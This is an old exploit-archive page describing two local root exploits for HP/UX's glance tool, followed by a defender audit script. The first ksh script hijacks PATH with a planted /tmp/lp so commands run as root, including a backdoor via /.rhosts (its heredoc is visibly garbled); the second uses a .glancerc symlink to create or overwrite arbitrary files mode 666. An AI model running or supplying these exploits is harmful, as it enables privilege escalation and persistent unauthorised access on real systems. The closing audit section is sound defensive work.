More HP/UX glance vulnerabilities
Description: A couple more old glance vulnerabilities
Author: Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable glance, maybe 9.x or 10.x
Date: Unknown
Notes: See the SOD HP Bug of the Week page
Exploit:
--exploit 1: glance-lp
#!/bin/ksh
# the other .traz
GLANCE=/usr/perf/bin/glance
# Put any commands you want into /tmp/lp, and they'll be run as root, basically
cat > /tmp/lp <> /.rhosts
chmod 666 /.rhosts
EOF
echo "Please wait about 10 or 15 seconds for your commands to run"
chmod 777 /tmp/lp
PATH=/tmp:$PATH
export PATH
${GLANCE} -j 1 -p bob -iterations 1 -maxpages 1 > /dev/null 2>&1
rm /tmp/lp
--exploit 2: glance-rc
#!/bin/ksh
# the one .traz
FILE=$1
PROGGIE=`basename $0`
GLANCE=/usr/perf/bin/glance
if [ -z "$1" ]
then
    echo "usage: $PROGGIE file_to_create_or_overwrite"
    exit
fi
if [ -f ~/.glancerc ]
then
    mv ~/.glancerc ~/.glancerc.old
fi
umask 0
ln -s $FILE ~/.glancerc
if [ -f $FILE ]
then
    echo "File exists -- will be overwritten with garbage"
else
    echo "File doesn't exist -- will be created mode 666"
    CREATE_666="yes"
fi
echo "Please wait about 10 seconds or so"
${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1
if [ -n "${CREATE_666}" ]
then
    >$FILE
fi
rm ~/.glancerc
if [ -f ~/.glancerc.old ]
then
    mv ~/.glancerc.old ~/.glancerc
fi
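A defender-side check for the two issues above, as an added example that is not part of the original page: it reports whether glance is setuid, lists .glancerc files that are symbolic links, and flags executables named lp in the directories you name. The function names and the home-directory base are assumptions; GLANCE is the path the scripts above use.

```shell
#!/bin/sh
# Added audit example, not from the original page. GLANCE is the path used by
# the page's scripts; the home-directory base passed in is an assumption.
GLANCE=/usr/perf/bin/glance

# True if the file carries the setuid bit (the precondition for both issues).
is_setuid() {
    [ -u "$1" ]
}

# Print "link -> target" for every .glancerc directly under the home
# directories in $1 that is a symbolic link rather than a regular file.
symlinked_glancerc() {
    for home in "$1"/*; do
        rc="$home/.glancerc"
        if [ -L "$rc" ]; then
            echo "$rc -> $(ls -l "$rc" | sed 's/^.* -> //')"
        fi
    done
}

# Print executables named "lp" found in the directories given as arguments
# (intended for world-writable ones such as /tmp, never a system bin dir).
planted_lp() {
    for dir in "$@"; do
        if [ -f "$dir/lp" ] && [ -x "$dir/lp" ]; then
            echo "$dir/lp"
        fi
    done
}

# Full report: audit_glance HOME_BASE DIR...
audit_glance() {
    base=$1; shift
    if is_setuid "$GLANCE"; then echo "setuid: $GLANCE"; fi
    symlinked_glancerc "$base"
    planted_lp "$@"
}

# Example invocation when run as a script: ./audit.sh /home /tmp /var/tmp
if [ "$#" -gt 0 ]; then audit_glance "$@"; fi
```

Any line of output is a finding to investigate; an empty report means none of the three conditions was present at the time of the run.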
This page is part of Fyodor's exploit world.